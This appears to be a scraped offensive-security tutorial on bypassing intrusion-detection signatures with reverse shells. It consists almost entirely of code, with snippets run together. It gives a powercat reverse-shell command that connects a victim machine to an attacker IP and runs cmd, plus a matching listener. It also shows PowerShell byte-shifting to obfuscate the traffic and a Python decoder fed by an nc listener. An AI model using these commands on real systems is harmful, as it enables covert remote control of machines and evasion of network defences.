Bypassing IDS Signatures with Simple Reverse Shells
Last updated
$Data = $Data | % {[byte]$_+1}# victim
powercat -c 192.168.2.79 443 -e cmd
#attacker
powercat -l -p 443 -v$Data = $Data | % {[byte]$_-1}#!/usr/bin/python3
import os, time
global decoded
while 1:
decoded = ""
encodedFile = open("myfile", "rb+")
i = 0
last = ""
encodedBytes = encodedFile.read()
for byte in encodedBytes:
if byte > 0 and byte <= 127:
byte -= 1
else:
byte = 10
if byte != last:
decoded += chr(byte)
last = byte
i += 1
if len(decoded) > 1:
print(decoded)
os.system("echo > myfile")
time.sleep(1)nc -lvvp 443 | tee myfile./decoder.py